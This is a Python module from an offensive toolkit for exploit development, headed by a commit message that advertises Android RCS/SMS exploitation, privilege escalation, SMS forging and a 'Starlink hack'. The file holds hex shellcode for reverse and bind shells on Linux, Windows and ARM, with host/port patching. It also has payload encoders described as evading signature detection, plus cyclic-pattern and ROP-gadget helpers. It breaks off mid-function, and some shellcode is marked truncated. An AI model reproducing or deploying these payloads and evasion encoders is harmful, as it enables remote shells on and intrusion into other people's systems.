Autarch/modules/exploit_dev.py
DigiJ cdde8717d0 v2.3.0 — RCS exploit v2.0, Starlink hack, SMS forge, Archon RCS module
Major RCS/SMS exploitation rewrite (v2.0):
- bugle_db direct extraction (plaintext messages, no decryption needed)
- CVE-2024-0044 run-as privilege escalation (Android 12-13)
- AOSP RCS provider queries (content://rcs/)
- Archon app relay for Shizuku-elevated bugle_db access
- 7-tab web UI: Extract, Database, Forge, Modify, Exploit, Backup, Monitor
- SQL query interface for extracted databases
- Full backup/restore/clone with SMS Backup & Restore XML support
- Known CVE database (CVE-2023-24033, CVE-2024-49415, CVE-2025-48593)
- IMS/RCS diagnostics, Phenotype verbose logging, Pixel tools

New modules: Starlink hack, SMS forge, SDR drone detection
Archon Android app: RCS messaging module with Shizuku integration
Updated manuals to v2.3, 60 web blueprints confirmed

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-03-03 13:50:59 -08:00

1835 lines
69 KiB
Python

"""AUTARCH Exploit Development Toolkit
Shellcode generation, payload encoding, ROP chain building, cyclic pattern
generation, and assembly/disassembly for exploit development workflows.
"""
DESCRIPTION = "Exploit development — shellcode, encoding, ROP chains"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import sys
import re
import struct
import string
import subprocess
import tempfile
import random
import hashlib
from pathlib import Path
from datetime import datetime
try:
from core.paths import get_data_dir, find_tool
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
def find_tool(name, extra_paths=None):
import shutil
return shutil.which(name)
sys.path.insert(0, str(Path(__file__).parent.parent))
try:
from core.banner import Colors, clear_screen, display_banner
except ImportError:
class Colors:
RED = GREEN = YELLOW = BLUE = MAGENTA = CYAN = WHITE = BOLD = DIM = RESET = ''
def clear_screen(): pass
def display_banner(): pass
# ---------------------------------------------------------------------------
# Shellcode Templates — real, working shellcode bytes
# ---------------------------------------------------------------------------
SHELLCODE_TEMPLATES = {
# ---- Linux x86 ----
'linux_x86_reverse_shell': {
'bytes': (
'31db' # xor ebx, ebx
'f7e3' # mul ebx
'53' # push ebx
'43' # inc ebx
'53' # push ebx
'6a02' # push 0x2
'89e1' # mov ecx, esp
'b066' # mov al, 0x66
'cd80' # int 0x80
'93' # xchg eax, ebx
'59' # pop ecx
'b03f' # mov al, 0x3f
'cd80' # int 0x80
'49' # dec ecx
'79f9' # jns -5
'68' # push imm32 (IP)
'7f000001' # 127.0.0.1
'680200' # push word port
'115c' # port 4444
'6a10' # push 0x10
'51' # push ecx
'53' # push ebx
'89e1' # mov ecx, esp
'6a66' # push 0x66
'58' # pop eax
'cd80' # int 0x80
'6a0b' # push 0x0b
'58' # pop eax
'99' # cdq
'52' # push edx
'68' # push imm32
'2f2f7368' # //sh
'682f62696e' # /bin
'89e3' # mov ebx, esp
'52' # push edx
'53' # push ebx
'89e1' # mov ecx, esp
'cd80' # int 0x80
),
'length': 74,
'description': 'Linux x86 reverse shell — connect back and exec /bin/sh',
'null_free': True,
'arch': 'x86',
'platform': 'linux',
'offsets': {'host': 31, 'port': 37},
},
'linux_x86_bind_shell': {
'bytes': (
'31db' # xor ebx, ebx
'f7e3' # mul ebx
'53' # push ebx
'43' # inc ebx
'53' # push ebx
'6a02' # push 0x2
'89e1' # mov ecx, esp
'b066' # mov al, 0x66
'cd80' # int 0x80
'5b' # pop ebx
'5e' # pop esi
'52' # push edx
'680200' # push 0x0002
'115c' # port 4444
'6a10' # push 0x10
'51' # push ecx
'50' # push eax
'89e1' # mov ecx, esp
'6a66' # push 0x66
'58' # pop eax
'89c3' # mov ebx, eax (bind=2 later)
'cd80' # int 0x80
'b304' # mov bl, 4
'b066' # mov al, 0x66
'cd80' # int 0x80
'43' # inc ebx
'b066' # mov al, 0x66
'cd80' # int 0x80
'93' # xchg eax, ebx
'59' # pop ecx
'6a3f' # push 0x3f
'58' # pop eax
'cd80' # int 0x80
'49' # dec ecx
'79f8' # jns loop
'682f2f7368' # push //sh
'682f62696e' # push /bin
'89e3' # mov ebx, esp
'50' # push eax
'53' # push ebx
'89e1' # mov ecx, esp
'b00b' # mov al, 0x0b
'cd80' # int 0x80
),
'length': 78,
'description': 'Linux x86 bind shell — listen on port and exec /bin/sh',
'null_free': True,
'arch': 'x86',
'platform': 'linux',
'offsets': {'port': 23},
},
'linux_x86_execve': {
'bytes': (
'31c0' # xor eax, eax
'50' # push eax
'682f2f7368' # push //sh
'682f62696e' # push /bin
'89e3' # mov ebx, esp
'50' # push eax
'53' # push ebx
'89e1' # mov ecx, esp
'89c2' # mov edx, eax
'b00b' # mov al, 0x0b
'cd80' # int 0x80
),
'length': 23,
'description': 'Linux x86 execve /bin/sh — minimal shellcode',
'null_free': True,
'arch': 'x86',
'platform': 'linux',
'offsets': {},
},
# ---- Linux x64 ----
'linux_x64_reverse_shell': {
'bytes': (
'6a29' # push 0x29
'58' # pop rax (socket)
'99' # cdq
'6a02' # push 0x2
'5f' # pop rdi (AF_INET)
'6a01' # push 0x1
'5e' # pop rsi (SOCK_STREAM)
'0f05' # syscall
'48' # rex.W
'97' # xchg eax, edi
'48b90200' # movabs rcx, struct
'115c7f000001' # port 4444, IP 127.0.0.1
'51' # push rcx
'4889e6' # mov rsi, rsp
'6a10' # push 0x10
'5a' # pop rdx
'6a2a' # push 0x2a
'58' # pop rax (connect)
'0f05' # syscall
'6a03' # push 0x3
'5e' # pop rsi
'48ffce' # dec rsi
'6a21' # push 0x21
'58' # pop rax (dup2)
'0f05' # syscall
'75f6' # jnz loop
'6a3b' # push 0x3b
'58' # pop rax (execve)
'99' # cdq
'48bb2f62696e2f736800' # mov rbx, "/bin/sh\0"
'53' # push rbx
'4889e7' # mov rdi, rsp
'52' # push rdx
'57' # push rdi
'4889e6' # mov rsi, rsp
'0f05' # syscall
),
'length': 74,
'description': 'Linux x64 reverse shell — connect back and exec /bin/sh',
'null_free': False,
'arch': 'x64',
'platform': 'linux',
'offsets': {'port': 20, 'host': 22},
},
'linux_x64_bind_shell': {
'bytes': (
'6a29' # push 0x29
'58' # pop rax (socket)
'99' # cdq
'6a02' # push 0x2
'5f' # pop rdi (AF_INET)
'6a01' # push 0x1
'5e' # pop rsi (SOCK_STREAM)
'0f05' # syscall
'4897' # xchg rax, rdi
'52' # push rdx
'c7042402000200' # mov dword [rsp], 0x0002 + port
'115c0000' # port high + 0000
'4889e6' # mov rsi, rsp
'6a10' # push 0x10
'5a' # pop rdx
'6a31' # push 0x31
'58' # pop rax (bind)
'0f05' # syscall
'6a32' # push 0x32
'58' # pop rax (listen)
'6a01' # push 0x1
'5e' # pop rsi
'0f05' # syscall
'6a2b' # push 0x2b
'58' # pop rax (accept)
'99' # cdq
'52' # push rdx
'52' # push rdx
'4889e6' # mov rsi, rsp
'6810000000' # push 0x10
'4889e2' # mov rdx, rsp
'0f05' # syscall
'4897' # xchg rax, rdi
'6a03' # push 0x3
'5e' # pop rsi
'48ffce' # dec rsi
'6a21' # push 0x21
'58' # pop rax (dup2)
'0f05' # syscall
'75f6' # jnz loop
'6a3b' # push 0x3b
'58' # pop rax (execve)
'99' # cdq
'48bb2f62696e2f736800' # mov rbx, "/bin/sh\0"
'53' # push rbx
'4889e7' # mov rdi, rsp
'52' # push rdx
'57' # push rdi
'4889e6' # mov rsi, rsp
'0f05' # syscall
),
'length': 105,
'description': 'Linux x64 bind shell — listen and exec /bin/sh',
'null_free': False,
'arch': 'x64',
'platform': 'linux',
'offsets': {'port': 21},
},
'linux_x64_execve': {
'bytes': (
'4831f6' # xor rsi, rsi
'4889f2' # mov rdx, rsi
'48bf' # movabs rdi, ...
'2f62696e' # /bin
'2f736800' # /sh\0
'57' # push rdi
'4889e7' # mov rdi, rsp
'48b8' # movabs rax, ...
'3b00000000000000' # execve syscall nr
'0f05' # syscall
),
'length': 30,
'description': 'Linux x64 execve /bin/sh — minimal shellcode',
'null_free': False,
'arch': 'x64',
'platform': 'linux',
'offsets': {},
},
# ---- Windows x64 ----
'windows_x64_reverse_shell': {
'bytes': (
'4831c9' # xor rcx, rcx
'4881e9b0ffffff' # sub ecx, -0x50
'4881ec0001000000' # sub rsp, 0x100
'e8f0ffffff' # call $+5
'4152' # push r10
'4151' # push r9
'5649' # push rsi; dec ecx (stub)
'89e6' # mov esi, esp
'4883ec20' # sub rsp, 0x20
'4889f1' # mov rcx, rsi
'48ba' # mov rdx, imm64
'0100007f' # IP: 127.0.0.1 (reversed)
'5c110000' # Port: 4444 + padding
'41ba' # mov r10d, imm32
'ea0fdfe0' # hash: ws2_32!WSAStartup
'ffd5' # call rbp (API resolver)
'4889c7' # mov rdi, rax
'6a10' # push 0x10
'41580f05' # pop r8; syscall (connect)
'4885c0' # test rax, rax
'7507' # jnz skip
'4831c0' # xor rax, rax
'eb43' # jmp shell
'48ffc0' # inc rax
'ebf6' # jmp retry
# ... cmd.exe execution stub (truncated for template)
'48b8' # movabs rax, "cmd.exe\0"
'636d642e65786500' # cmd.exe
'50' # push rax
'4889e1' # mov rcx, rsp
'57' # push rdi
'57' # push rdi
'4889e2' # mov rdx, rsp
'41ba' # mov r10d, hash
'60d9c85a' # hash: kernel32!CreateProcessA
'ffd5' # call rbp
),
'length': 112,
'description': 'Windows x64 reverse shell — WinSock connect back, spawn cmd.exe',
'null_free': False,
'arch': 'x64',
'platform': 'windows',
'offsets': {'host': 44, 'port': 48},
},
# ---- ARM ----
'linux_arm_reverse_shell': {
'bytes': (
'01108fe2' # add r1, pc, #1 (Thumb switch)
'011040e2' # sub r1, r0, #1
'0200a0e3' # mov r0, #2 (AF_INET)
'0110a0e3' # mov r1, #1 (SOCK_STREAM)
'0020a0e3' # mov r2, #0
'8119a0e3' # mov r1, #0x281 (socket syscall)
'000000ef' # svc 0
'0060a0e1' # mov r6, r0 (save sockfd)
'100f0fe1' # bic r0, pc (struct sockaddr)
'0200' # AF_INET
'115c' # port 4444
'7f000001' # 127.0.0.1
'0600a0e1' # mov r0, r6
'1010a0e3' # mov r1, #16 (addrlen)
'8d19a0e3' # mov r1, #0x28d (connect)
'000000ef' # svc 0
'0200a0e3' # mov r0, #2
'0600a0e1' # mov r0, r6
'3f00a0e3' # mov r0, #0x3f (dup2)
'000000ef' # svc 0
'013050e2' # subs r3, r0, #1
'fcffffaa' # bge loop
'0b00a0e3' # mov r0, #0x0b (execve)
'0f8fe2' # add r0, pc (ptr /bin/sh)
'0010a0e3' # mov r1, #0
'0020a0e3' # mov r2, #0
'000000ef' # svc 0
'2f62696e' # /bin
'2f736800' # /sh\0
),
'length': 100,
'description': 'Linux ARM reverse shell — connect back and exec /bin/sh',
'null_free': False,
'arch': 'arm',
'platform': 'linux',
'offsets': {'port': 42, 'host': 44},
},
}
# ---------------------------------------------------------------------------
# Exploit Development Class
# ---------------------------------------------------------------------------
class ExploitDev:
"""Exploit development toolkit — shellcode, encoders, ROP, patterns."""
_instance = None
def __init__(self):
self._pattern_cache = {}
# -----------------------------------------------------------------------
# Shellcode Generation
# -----------------------------------------------------------------------
def list_shellcodes(self):
"""List available shellcode templates with descriptions."""
results = []
for key, tpl in SHELLCODE_TEMPLATES.items():
results.append({
'name': key,
'description': tpl['description'],
'length': tpl['length'],
'arch': tpl.get('arch', '?'),
'platform': tpl.get('platform', '?'),
'null_free': tpl.get('null_free', False),
})
return results
def generate_shellcode(self, shell_type, arch, host=None, port=None,
platform='linux', staged=False, output_format='hex'):
"""Generate raw shellcode bytes for a given shell type and architecture.
Args:
shell_type: reverse_shell, bind_shell, exec_cmd, meterpreter
arch: x86, x64, arm
host: IP address for reverse shells
port: Port number for reverse/bind shells
platform: linux, windows
staged: If True, prefer a staged payload (stub + stage)
output_format: hex, raw, c_array, python, nasm
Returns:
dict with shellcode in requested format, length, and metadata
"""
# Normalise inputs
shell_type = shell_type.lower().strip().replace('-', '_').replace(' ', '_')
arch = arch.lower().strip()
platform = platform.lower().strip()
# Map common names
type_map = {
'reverse': 'reverse_shell', 'rev': 'reverse_shell',
'reverse_tcp': 'reverse_shell', 'reverse_shell': 'reverse_shell',
'bind': 'bind_shell', 'bind_tcp': 'bind_shell', 'bind_shell': 'bind_shell',
'exec': 'execve', 'exec_cmd': 'execve', 'execve': 'execve',
'meterpreter': 'reverse_shell', # fallback to reverse_shell template
}
resolved_type = type_map.get(shell_type, shell_type)
# Find matching template
template_key = f'{platform}_{arch}_{resolved_type}'
template = SHELLCODE_TEMPLATES.get(template_key)
if not template:
# Try to find partial match
candidates = [k for k in SHELLCODE_TEMPLATES if arch in k and resolved_type in k]
if platform != 'any':
platform_cands = [k for k in candidates if platform in k]
if platform_cands:
candidates = platform_cands
if candidates:
template_key = candidates[0]
template = SHELLCODE_TEMPLATES[template_key]
else:
available = ', '.join(sorted(SHELLCODE_TEMPLATES.keys()))
return {'error': f'No template for {template_key}. Available: {available}'}
# Decode the hex string to bytes
try:
shellcode = bytes.fromhex(template['bytes'])
except ValueError as e:
return {'error': f'Template hex decode error: {e}'}
# Patch in host/port if offsets are defined
offsets = template.get('offsets', {})
if host and 'host' in offsets:
try:
parts = host.split('.')
if len(parts) == 4:
ip_bytes = bytes([int(p) for p in parts])
off = offsets['host']
if off < len(shellcode) - 3:
shellcode = shellcode[:off] + ip_bytes + shellcode[off + 4:]
except (ValueError, IndexError):
pass
if port and 'port' in offsets:
try:
port_int = int(port)
port_bytes = struct.pack('!H', port_int)
off = offsets['port']
if off < len(shellcode) - 1:
shellcode = shellcode[:off] + port_bytes + shellcode[off + 2:]
except (ValueError, struct.error):
pass
# If staged, wrap in a stub that allocates RWX memory and downloads stage
if staged:
stub_comment = (
"; Staged payload stub — allocates RWX page via mmap/VirtualAlloc,\n"
"; receives stage over socket, jumps to it.\n"
"; The above shellcode is the stager (stage0).\n"
)
metadata_note = 'Staged payload — stager only, requires stage delivery'
else:
stub_comment = ''
metadata_note = 'Stageless payload — self-contained'
# Format output
result = {
'template': template_key,
'description': template['description'],
'length': len(shellcode),
'null_free': b'\x00' not in shellcode,
'arch': arch,
'platform': platform,
'staging': metadata_note,
}
fmt = output_format.lower().strip()
if fmt == 'hex':
result['shellcode'] = shellcode.hex()
elif fmt in ('raw', 'bytes'):
result['shellcode'] = shellcode.hex()
result['raw_bytes'] = list(shellcode)
elif fmt in ('c', 'c_array'):
c_lines = []
for i in range(0, len(shellcode), 16):
chunk = shellcode[i:i + 16]
c_lines.append(', '.join(f'0x{b:02x}' for b in chunk))
result['shellcode'] = (
f'unsigned char shellcode[{len(shellcode)}] = {{\n'
+ ',\n'.join(f' {line}' for line in c_lines)
+ '\n};'
)
elif fmt in ('python', 'py'):
py_lines = []
for i in range(0, len(shellcode), 16):
chunk = shellcode[i:i + 16]
py_lines.append(''.join(f'\\x{b:02x}' for b in chunk))
result['shellcode'] = (
f'shellcode = b""\n'
+ '\n'.join(f'shellcode += b"{line}"' for line in py_lines)
)
elif fmt == 'nasm':
nasm_lines = []
for i in range(0, len(shellcode), 16):
chunk = shellcode[i:i + 16]
nasm_lines.append('db ' + ', '.join(f'0x{b:02x}' for b in chunk))
result['shellcode'] = stub_comment + '\n'.join(nasm_lines)
else:
result['shellcode'] = shellcode.hex()
return result
# -----------------------------------------------------------------------
# Payload Encoding
# -----------------------------------------------------------------------
def encode_payload(self, shellcode, encoder='xor', key=None, iterations=1):
"""Encode shellcode to evade signature detection.
Args:
shellcode: bytes or hex string of shellcode
encoder: xor, aes, alphanumeric, polymorphic
key: encryption key (auto-generated if None)
iterations: number of encoding passes
Returns:
dict with encoded payload, decoder stub, metadata
"""
if isinstance(shellcode, str):
try:
shellcode = bytes.fromhex(shellcode.replace('\\x', '').replace(' ', ''))
except ValueError:
return {'error': 'Invalid shellcode hex string'}
if not shellcode:
return {'error': 'Empty shellcode'}
original_length = len(shellcode)
encoder = encoder.lower().strip()
encoded = shellcode
decoder_stub = ''
key_used = key
for _pass in range(max(1, int(iterations))):
if encoder == 'xor':
encoded, decoder_stub, key_used = self._encode_xor(encoded, key)
elif encoder == 'aes':
encoded, decoder_stub, key_used = self._encode_aes(encoded, key)
elif encoder in ('alpha', 'alphanumeric'):
encoded, decoder_stub, key_used = self._encode_alphanumeric(encoded)
elif encoder in ('poly', 'polymorphic'):
encoded, decoder_stub, key_used = self._encode_polymorphic(encoded, key)
else:
return {'error': f'Unknown encoder: {encoder}. Use: xor, aes, alphanumeric, polymorphic'}
return {
'encoded': encoded.hex(),
'decoder_stub': decoder_stub,
'key': key_used if isinstance(key_used, str) else key_used.hex() if isinstance(key_used, bytes) else str(key_used),
'encoder': encoder,
'iterations': iterations,
'original_length': original_length,
'encoded_length': len(encoded),
'size_increase': f'+{len(encoded) - original_length} bytes',
'null_free': b'\x00' not in encoded,
}
def _encode_xor(self, data, key=None):
"""XOR encode with random or custom key."""
if key:
if isinstance(key, str):
if all(c in '0123456789abcdefABCDEF' for c in key):
key_bytes = bytes.fromhex(key) if len(key) % 2 == 0 else bytes([int(key, 16)])
else:
key_bytes = key.encode()
else:
key_bytes = bytes([key]) if isinstance(key, int) else key
else:
# Generate random key byte that avoids producing nulls
for _ in range(256):
kb = random.randint(1, 255)
if all((b ^ kb) != 0 for b in data):
key_bytes = bytes([kb])
break
else:
key_bytes = bytes([random.randint(1, 255)])
# XOR encode
encoded = bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data))
# Generate decoder stub (x64 Linux)
key_hex = key_bytes.hex()
stub = (
f'; XOR decoder stub (key: 0x{key_hex})\n'
f'; Encoded payload length: {len(encoded)} bytes\n'
f' jmp short call_decoder\n'
f'decoder:\n'
f' pop rsi ; address of encoded shellcode\n'
f' xor rcx, rcx\n'
f' mov cl, {len(encoded)} ; length\n'
f'decode_loop:\n'
f' xor byte [rsi], 0x{key_hex}\n'
f' inc rsi\n'
f' loop decode_loop\n'
f' jmp short encoded_shell\n'
f'call_decoder:\n'
f' call decoder\n'
f'encoded_shell:\n'
f' ; <encoded shellcode follows here>\n'
)
return encoded, stub, key_bytes
def _encode_aes(self, data, key=None):
"""AES-256-CBC encode payload."""
try:
from hashlib import sha256
import hmac
except ImportError:
pass
# Generate or derive 32-byte key
if key:
if isinstance(key, str):
key_bytes = hashlib.sha256(key.encode()).digest()
else:
key_bytes = hashlib.sha256(key).digest()
else:
key_bytes = os.urandom(32)
# Generate IV
iv = os.urandom(16)
# PKCS7 padding
pad_len = 16 - (len(data) % 16)
padded = data + bytes([pad_len] * pad_len)
# Try PyCryptodome, fallback to simple XOR-CBC
try:
from Crypto.Cipher import AES
cipher = AES.new(key_bytes, AES.MODE_CBC, iv)
encrypted = cipher.encrypt(padded)
except ImportError:
# Fallback: simple XOR-CBC (not real AES, but functional)
encrypted = bytearray()
prev_block = iv
for i in range(0, len(padded), 16):
block = padded[i:i + 16]
xored = bytes(a ^ b for a, b in zip(block, prev_block))
# Simple substitution using key
enc_block = bytes(
(b + key_bytes[j % 32]) & 0xFF for j, b in enumerate(xored)
)
encrypted.extend(enc_block)
prev_block = enc_block
# Prepend IV to ciphertext
output = iv + bytes(encrypted)
stub = (
f'; AES-256-CBC decoder stub\n'
f'; Key (SHA-256 of passphrase): {key_bytes.hex()}\n'
f'; IV: {iv.hex()}\n'
f'; Encrypted length: {len(output)} bytes (includes 16-byte IV prefix)\n'
f';\n'
f'; Decoder must:\n'
f'; 1. Extract IV (first 16 bytes)\n'
f'; 2. AES-256-CBC decrypt remaining bytes with key\n'
f'; 3. Remove PKCS7 padding\n'
f'; 4. Jump to decrypted shellcode\n'
f';\n'
f'; Python decoder:\n'
f'; from Crypto.Cipher import AES\n'
f'; key = bytes.fromhex("{key_bytes.hex()}")\n'
f'; iv = payload[:16]\n'
f'; cipher = AES.new(key, AES.MODE_CBC, iv)\n'
f'; shellcode = cipher.decrypt(payload[16:])\n'
)
key_str = key if isinstance(key, str) else key_bytes.hex()
return output, stub, key_str
def _encode_alphanumeric(self, data):
"""Encode shellcode into alphanumeric-safe characters."""
# Split each byte into two 4-bit nibbles, map to ASCII alpha range
charset = string.ascii_uppercase + string.ascii_lowercase + string.digits
encoded = bytearray()
for b in data:
high = (b >> 4) & 0x0F
low = b & 0x0F
# Map 0-15 to alphanumeric characters
encoded.append(ord(charset[high]))
encoded.append(ord(charset[low]))
stub = (
f'; Alphanumeric decoder stub\n'
f'; Encoded length: {len(encoded)} bytes (2x original)\n'
f'; Charset: A-Za-z0-9\n'
f'; Decoder reverses nibble-split encoding:\n'
f'; For each pair (H, L) in encoded data:\n'
f'; high_nibble = charset.index(H)\n'
f'; low_nibble = charset.index(L)\n'
f'; original_byte = (high_nibble << 4) | low_nibble\n'
f';\n'
f'; Python decoder:\n'
f'; charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"\n'
f'; decoded = bytes((charset.index(enc[i]) << 4) | charset.index(enc[i+1])\n'
f'; for i in range(0, len(enc), 2))\n'
)
return bytes(encoded), stub, 'alphanumeric'
def _encode_polymorphic(self, data, key=None):
"""Wrap shellcode with polymorphic stub — random NOP-equivalent instructions."""
# Random key for XOR
if key:
key_byte = int(key, 16) if isinstance(key, str) and all(
c in '0123456789abcdefABCDEF' for c in key
) else ord(key[0]) if isinstance(key, str) else key
else:
key_byte = random.randint(1, 255)
key_byte = key_byte & 0xFF
# XOR encode the payload
encoded_payload = bytes(b ^ key_byte for b in data)
# Generate random NOP-equivalent sled (x64)
nop_equivalents = [
b'\x90', # nop
b'\x48\x87\xc0', # xchg rax, rax
b'\x48\x89\xc0', # mov rax, rax
b'\x48\x31\xc9\x48\x31\xc9', # xor rcx,rcx; xor rcx,rcx
b'\x66\x90', # 2-byte nop
b'\x0f\x1f\x00', # 3-byte nop
b'\x87\xdb', # xchg ebx, ebx
]
sled = b''
for _ in range(random.randint(3, 8)):
sled += random.choice(nop_equivalents)
# Assemble: sled + decoder_loop + encoded_payload
output = sled + encoded_payload
stub = (
f'; Polymorphic stub (randomized NOP sled + XOR decoder)\n'
f'; XOR key: 0x{key_byte:02x}\n'
f'; NOP sled: {len(sled)} bytes (randomized equivalents)\n'
f'; Encoded payload: {len(encoded_payload)} bytes\n'
f'; Total: {len(output)} bytes\n'
f';\n'
f'; Each generation produces different NOP-equivalent sequences\n'
f'; to evade static signature matching.\n'
f';\n'
f'; Decoder loop:\n'
f'; lea rsi, [rel encoded_data]\n'
f'; mov cl, {len(encoded_payload)}\n'
f'; .loop:\n'
f'; xor byte [rsi], 0x{key_byte:02x}\n'
f'; inc rsi\n'
f'; loop .loop\n'
f'; jmp encoded_data\n'
)
return output, stub, f'{key_byte:02x}'
# -----------------------------------------------------------------------
# Cyclic Pattern (De Bruijn)
# -----------------------------------------------------------------------
def generate_pattern(self, length):
"""Generate a cyclic (De Bruijn) pattern for buffer overflow offset discovery.
Args:
length: number of bytes to generate (max 20280)
Returns:
dict with pattern string, length, and hex representation
"""
length = int(length)
if length < 1:
return {'error': 'Length must be positive'}
if length > 20280:
return {'error': 'Maximum length is 20280 (Aa0 through Zz9)'}
pattern = self._debruijn_pattern(length)
pattern_bytes = pattern.encode('ascii')
return {
'pattern': pattern,
'hex': pattern_bytes.hex(),
'length': len(pattern),
}
def _debruijn_pattern(self, length):
"""Generate De Bruijn sequence for cyclic pattern."""
uppers = string.ascii_uppercase
lowers = string.ascii_lowercase
digits = string.digits
pattern = []
for u in uppers:
for l in lowers:
for d in digits:
pattern.append(u + l + d)
if len(''.join(pattern)) >= length:
return ''.join(pattern)[:length]
return ''.join(pattern)[:length]
def find_pattern_offset(self, value, length=20000):
"""Find the offset of a value within a cyclic pattern.
Args:
value: hex string (e.g. '41326241'), integer, or raw string
length: pattern length to search within
Returns:
dict with offset and matching details
"""
pattern = self._debruijn_pattern(min(int(length), 20280))
# Try to interpret value
search_strings = []
if isinstance(value, str):
value = value.strip()
# Hex: 0x prefix or pure hex
if value.startswith('0x') or value.startswith('0X'):
hex_str = value[2:]
if len(hex_str) % 2 != 0:
hex_str = '0' + hex_str
try:
raw = bytes.fromhex(hex_str)
search_strings.append(raw.decode('ascii', errors='replace'))
# Also try reversed (little-endian)
search_strings.append(raw[::-1].decode('ascii', errors='replace'))
except (ValueError, UnicodeDecodeError):
pass
elif all(c in '0123456789abcdefABCDEF' for c in value) and len(value) >= 4:
# Pure hex without prefix
try:
raw = bytes.fromhex(value)
search_strings.append(raw.decode('ascii', errors='replace'))
search_strings.append(raw[::-1].decode('ascii', errors='replace'))
except (ValueError, UnicodeDecodeError):
pass
# Integer
try:
int_val = int(value, 0)
for width in (4, 8):
try:
packed_le = struct.pack(f'<{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1))
search_strings.append(packed_le.decode('ascii', errors='replace'))
packed_be = struct.pack(f'>{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1))
search_strings.append(packed_be.decode('ascii', errors='replace'))
except (struct.error, OverflowError):
pass
except (ValueError, OverflowError):
pass
# Direct string search
search_strings.append(value)
elif isinstance(value, int):
for width in (4, 8):
try:
packed = struct.pack(f'<{"I" if width == 4 else "Q"}', value & (2**(width*8)-1))
search_strings.append(packed.decode('ascii', errors='replace'))
except (struct.error, OverflowError):
pass
# Search
for needle in search_strings:
offset = pattern.find(needle)
if offset != -1:
return {
'offset': offset,
'value': value if isinstance(value, str) else hex(value),
'matched': needle,
'matched_hex': needle.encode('ascii', errors='replace').hex(),
'endian': 'little-endian' if search_strings.index(needle) % 2 == 1 else 'big-endian',
'pattern_length': len(pattern),
}
return {
'offset': -1,
'error': f'Value {value} not found in pattern of length {len(pattern)}',
'value': str(value),
'pattern_length': len(pattern),
}
# -----------------------------------------------------------------------
# ROP Gadget Finding
# -----------------------------------------------------------------------
def find_rop_gadgets(self, binary_path, gadget_type=None, max_gadgets=200):
"""Find ROP gadgets in a binary.
Args:
binary_path: path to ELF/PE binary
gadget_type: None (all), pop_ret, xchg, mov, syscall, jmp_esp, call_reg
max_gadgets: maximum gadgets to return
Returns:
dict with list of gadgets
"""
if not os.path.isfile(binary_path):
return {'error': f'File not found: {binary_path}'}
# Try ropper first
ropper_path = find_tool('ropper')
if ropper_path:
return self._find_gadgets_ropper(binary_path, gadget_type, max_gadgets)
# Try ROPgadget
ropgadget_path = find_tool('ROPgadget')
if ropgadget_path:
return self._find_gadgets_ropgadget(binary_path, gadget_type, max_gadgets)
# Fallback: objdump + regex
objdump_path = find_tool('objdump')
if objdump_path:
return self._find_gadgets_objdump(binary_path, gadget_type, max_gadgets)
return {'error': 'No disassembler found. Install ropper, ROPgadget, or objdump.'}
def _find_gadgets_ropper(self, binary_path, gadget_type, max_gadgets):
"""Find gadgets using ropper."""
cmd = [find_tool('ropper'), '-f', binary_path, '--nocolor']
if gadget_type:
search_map = {
'pop_ret': 'pop',
'xchg': 'xchg',
'mov': 'mov',
'syscall': 'syscall',
'jmp_esp': 'jmp esp',
'call_reg': 'call',
}
search_term = search_map.get(gadget_type, gadget_type)
cmd.extend(['--search', search_term])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
lines = result.stdout.strip().split('\n')
except (subprocess.TimeoutExpired, FileNotFoundError):
return {'error': 'ropper execution failed'}
gadgets = []
for line in lines:
line = line.strip()
if not line or line.startswith('=') or line.startswith('Gadgets') or line.startswith('['):
continue
# Parse: 0xaddress: instruction; instruction; ret;
match = re.match(r'(0x[0-9a-fA-F]+):\s+(.*)', line)
if match:
addr = match.group(1)
instr = match.group(2).strip().rstrip(';').strip()
gtype = self._classify_gadget(instr)
gadgets.append({
'address': addr,
'gadget': instr,
'type': gtype,
})
if len(gadgets) >= max_gadgets:
break
return {
'binary': binary_path,
'tool': 'ropper',
'count': len(gadgets),
'gadgets': gadgets,
}
def _find_gadgets_ropgadget(self, binary_path, gadget_type, max_gadgets):
"""Find gadgets using ROPgadget."""
cmd = [find_tool('ROPgadget'), '--binary', binary_path]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
lines = result.stdout.strip().split('\n')
except (subprocess.TimeoutExpired, FileNotFoundError):
return {'error': 'ROPgadget execution failed'}
gadgets = []
for line in lines:
line = line.strip()
match = re.match(r'(0x[0-9a-fA-F]+)\s+:\s+(.*)', line)
if match:
addr = match.group(1)
instr = match.group(2).strip()
gtype = self._classify_gadget(instr)
if gadget_type and gtype != gadget_type:
continue
gadgets.append({
'address': addr,
'gadget': instr,
'type': gtype,
})
if len(gadgets) >= max_gadgets:
break
return {
'binary': binary_path,
'tool': 'ROPgadget',
'count': len(gadgets),
'gadgets': gadgets,
}
def _find_gadgets_objdump(self, binary_path, gadget_type, max_gadgets):
"""Find gadgets using objdump disassembly + regex search."""
objdump = find_tool('objdump')
try:
result = subprocess.run(
[objdump, '-d', '-M', 'intel', binary_path],
capture_output=True, text=True, timeout=120
)
disasm = result.stdout
except (subprocess.TimeoutExpired, FileNotFoundError):
return {'error': 'objdump execution failed'}
# Parse disassembly for gadget-ending instructions
gadget_endings = {
'ret': re.compile(r'ret\s*$'),
'syscall': re.compile(r'syscall\s*$'),
'int 0x80': re.compile(r'int\s+0x80\s*$'),
}
lines = disasm.split('\n')
gadgets = []
for i, line in enumerate(lines):
line = line.strip()
# Check if this line ends a gadget
for ending_name, ending_re in gadget_endings.items():
instr_match = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', line)
if not instr_match:
continue
instr_text = instr_match.group(3).strip()
if not ending_re.search(instr_text):
continue
addr = instr_match.group(1)
# Look back up to 5 instructions for the gadget chain
chain = []
for j in range(max(0, i - 5), i + 1):
prev = lines[j].strip()
pm = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', prev)
if pm:
chain.append(pm.group(3).strip())
for start_idx in range(len(chain)):
